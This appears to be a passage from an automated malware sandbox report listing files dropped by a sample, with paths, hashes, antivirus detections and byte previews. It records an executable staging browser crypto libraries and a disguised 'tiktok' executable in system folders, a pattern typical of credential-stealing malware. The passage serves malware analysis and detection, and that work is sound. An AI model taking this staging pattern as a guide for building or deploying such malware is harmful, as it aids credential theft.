Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	5.181418653672126
Encrypted:	false
SSDEEP:	6:BMKLwP4qtaAgrCYNP4HmLIYvgBtXQDP40RHB1JC29TOI0XY4eA:fKaXCYAmkYvgLXa/9673
MD5:	E5613B7939E5C33D9BC1EE077FC983DA
SHA1:	589200C5C874B729541B93C32946FD24DEBA4768
SHA-256:	03DF2120FCC9B2596A66EAF48D9C31077EEF682DA198D7519BC28A0BCA731E97
SHA-512:	F57DB0A9B1C9FFFC79AB601006128D0387951C4D3375CFD79CABCF33C7F50CCB90E5E86FA7D2574152F6F83C517932AF6684E643E03063BC7EC5B1591249D301
Malicious:	false
Preview:	Bootstrap LogFile..-----------------..[25/04/2024 09:04:34]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[25/04/2024 09:04:34]: This Brand IOLODEFAULT Not Detected As Installed..[25/04/2024 09:04:34]: No Supported Products Were Detected On This System..[25/04/2024 09:05:26]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.181879981744728
Encrypted:	false
SSDEEP:	6:q8jVMuMg0TCfk3VotGjZb34L8jVM0/Qilo4jVOQs0TCfk3VotGjZb34L8jVO0iQ2:ljt6TXVotgOL8jDoi/j4QHTXVotgOL82
MD5:	EC241707B73A48CC2CF580046C57BCE0
SHA1:	BE93B4D3A7A01A33904DF5720C846C2498C64B1C
SHA-256:	9DF0B43C4EAE5B257A603D62C4526A05524F6D20DBBE14B658A0A10D16DE1547
SHA-512:	AB999004D4ABC66BC7A906B194F3A52E8C8CCE760A57177A2FE641ADB702B14BA3CA88435B613A93CA6B7F19801C37AD5770A8B872E3AF3BA1848E2FA7BA0F67
Malicious:	false
Preview:	[04/25/24 09:04:08] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/25/24 09:04:09] IsValidCommunication : Result := True...[04/25/24 09:04:23] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/25/24 09:04:24] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\ozld1q5e.5tn

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21% Antivirus: Virustotal, Detection: 38%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6bc4c0fb

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.761450114032783
Encrypted:	false
SSDEEP:	24576:qoSKVXfYCLaLoFG+evn0wq+epoIpibue6yJiK4BI/9zUUQu/Mxu4UytemKDxguk9:qoSKRBaLXls0Ipibue6yJiK4BI/9zUU6
MD5:	4752ADE0216D093D91816B8A639A6405
SHA1:	FC6B4E6D4F1AFFF7CA233566CE19427B7B2CFB20
SHA-256:	3D3FF011110339C54608DCD9397FEB60F862F72543BD15DE21E1B8B9BEF92588
SHA-512:	6496DBC1EAC8A45737917E2F70B28A30CABC4EA6752660F1564CA4E19DE85E1A41702EC67D89231ADA0E28865691F4036BCB6E1D8D6992834CBEF43E52828777
Malicious:	false
